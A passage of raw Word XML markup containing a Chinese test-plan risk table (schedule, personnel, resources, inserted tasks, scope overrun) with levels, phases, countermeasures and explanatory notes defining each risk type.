            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="34B66017"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应对措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="53911F3B"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="224128E9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E299B0D"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时间计划</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D2DF57F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17300230" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27D09CA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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09170C90"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需求阶段</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5449ABE1"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验收阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2953C017" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CFCF4AC"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合理计划</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F431471"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及时调整</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B742877"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1D7CB5FE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38CB37A7"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人员风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6722E6AB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F828A1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B3B81A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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04E9C35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验收阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16F82BD0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49B5956A"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充分估计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5631EEF4"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预留buffer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A8F29D"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及时调整</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7070410E"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27D7FDA8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545E8725"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资源协调</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49738748" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7019C41F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2785D9D7"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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5502DB41"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安装部署</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A237C2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4203F1"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充分估计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729DEEB1"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增加冗余</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDAFAB5"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及时调整</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ED0B5B6"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40B8E0A1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="242AD74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b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>插入事务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A923A1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76CBD9D3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05706074"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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4330EBBA"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全周期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D01124" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="372E725D"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预留buffer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE61CED"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及时调整</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F059FC"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0A2EAB84" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8E504A"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任务超预期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AAEB84" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="751A0F7A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03D0A41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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76331DFA"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开发阶段</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2211FF0D"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验收阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="277259AF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68E75EBF"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及时沟通</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2AACDE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>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及时调整</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73366E34"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20B7BA47" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B76ACB6"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52CCA014" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F25F091" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D8AA139" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A57EA8B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69CD7A03" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ACEA2AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34439BAB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4371F063" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注：各个风险类型解释如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051FE175" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>时间计划：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>关键milestone无法匹配的延期风险。诸如项目存在deadline、计划受到客观条件限制、非己方责任导致地被动延期等等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318F0AA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>人员风险：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>测试人员和需配合方的人员的变动导致的工作任务无法按计划完成或者完成质量无法保证的风险，包括新人风险、人员变化、投入不足、投入质量</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>高等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED57536" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>资源协调：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>包括所需资源不能如期到位，或者资源质量低于预期等风险。比如测试工具开发的风险、各个阶段交付物的质量风险等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE6F16" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>插入事务：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>包括临时插入高优先级的事务，打乱原有计划等风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F869FE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>任务超预期：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>实际执行时的工作复杂程度、结果的质量同预期不符所带来的风险。属于不</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可预期的风险，只能待出现时及时合理地调整。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29072EA9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="600"/>
